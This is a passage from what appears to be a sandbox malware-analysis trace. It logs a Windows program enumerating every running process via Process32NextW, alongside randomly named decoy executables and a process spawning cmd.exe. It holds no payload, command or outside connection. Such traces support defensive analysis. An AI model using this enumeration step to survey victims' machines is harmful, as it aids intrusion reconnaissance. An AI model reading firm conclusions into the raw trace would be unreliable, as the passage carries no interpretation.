th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.235] lstrlenW (lpString="System") returned 6 [0212.235] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.236] lstrlenW (lpString="smss.exe") returned 8 [0212.236] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.237] lstrlenW (lpString="csrss.exe") returned 9 [0212.237] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.238] lstrlenW (lpString="wininit.exe") returned 11 [0212.238] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.239] lstrlenW (lpString="csrss.exe") returned 9 [0212.239] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.239] lstrlenW (lpString="winlogon.exe") returned 12 [0212.239] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.240] lstrlenW (lpString="services.exe") returned 12 [0212.240] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.241] lstrlenW (lpString="lsass.exe") returned 9 [0212.241] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.242] lstrlenW (lpString="svchost.exe") returned 11 [0212.242] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0212.242] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0212.242] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0212.243] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0212.243] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.245] lstrlenW (lpString="svchost.exe") returned 11 [0212.245] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.246] lstrlenW (lpString="dwm.exe") returned 7 [0212.246] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.247] lstrlenW (lpString="svchost.exe") returned 11 [0212.247] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.248] lstrlenW (lpString="svchost.exe") returned 11 [0212.248] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.249] lstrlenW (lpString="svchost.exe") returned 11 [0212.249] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.250] lstrlenW (lpString="svchost.exe") returned 11 [0212.250] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.251] lstrlenW (lpString="svchost.exe") returned 11 [0212.251] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.252] lstrlenW (lpString="svchost.exe") returned 11 [0212.252] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.253] lstrlenW (lpString="svchost.exe") returned 11 [0212.253] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.254] lstrlenW (lpString="svchost.exe") returned 11 [0212.254] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.255] lstrlenW (lpString="svchost.exe") returned 11 [0212.255] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.256] lstrlenW (lpString="spoolsv.exe") returned 11 [0212.256] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.257] lstrlenW (lpString="svchost.exe") returned 11 [0212.257] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.258] lstrlenW (lpString="svchost.exe") returned 11 [0212.258] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.259] lstrlenW (lpString="audiodg.exe") returned 11 [0212.259] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0212.260] lstrlenW (lpString="sihost.exe") returned 10 [0212.260] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.261] lstrlenW (lpString="svchost.exe") returned 11 [0212.261] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0212.262] lstrlenW (lpString="taskhostw.exe") returned 13 [0212.262] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.263] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0212.263] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0212.264] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0212.265] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.265] lstrlenW (lpString="explorer.exe") returned 12 [0212.265] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0212.266] lstrlenW (lpString="Memory Compression") returned 18 [0212.266] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0212.267] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0212.267] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0212.268] lstrlenW (lpString="SearchUI.exe") returned 12 [0212.268] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0212.269] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0212.269] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.270] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0212.270] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0212.270] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0212.270] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0212.271] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0212.271] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0212.272] lstrlenW (lpString="conhost.exe") returned 11 [0212.272] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0212.273] lstrlenW (lpString="roof competitive.exe") returned 20 [0212.273] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0212.273] lstrlenW (lpString="trustees.exe") returned 12 [0212.273] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0212.274] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0212.274] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0212.275] lstrlenW (lpString="isbn.exe") returned 8 [0212.275] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0212.276] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0212.276] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0212.276] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0212.277] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0212.277] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0212.277] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0212.278] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0212.278] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0212.279] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0212.279] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0212.279] lstrlenW (lpString="playstation iraq.exe") returned 20 [0212.279] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0212.280] lstrlenW (lpString="harbor.exe") returned 10 [0212.280] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0212.281] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0212.281] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0212.282] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0212.282] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0212.282] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0212.282] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0212.283] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0212.283] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0212.284] lstrlenW (lpString="larent.exe") returned 10 [0212.284] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0212.285] lstrlenW (lpString="stereo.exe") returned 10 [0212.285] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0212.285] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0212.286] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0212.286] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0212.286] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0212.287] lstrlenW (lpString="state.exe") returned 9 [0212.287] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0212.288] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0212.288] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.289] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0212.289] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0212.290] lstrlenW (lpString="taskhostw.exe") returned 13 [0212.290] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0212.290] lstrlenW (lpString="sppsvc.exe") returned 10 [0212.290] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.292] lstrlenW (lpString="svchost.exe") returned 11 [0212.292] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0212.292] lstrlenW (lpString="Pg.exe") returned 6 [0212.292] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0212.293] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0212.293] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0212.294] lstrlenW (lpString="conhost.exe") returned 11 [0212.294] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0212.295] lstrlenW (lpString="cmd.exe") returned 7 [0212.295] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0212.296] lstrlenW (lpString="conhost.exe") returned 11 [0212.296] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0212.296] lstrlenW 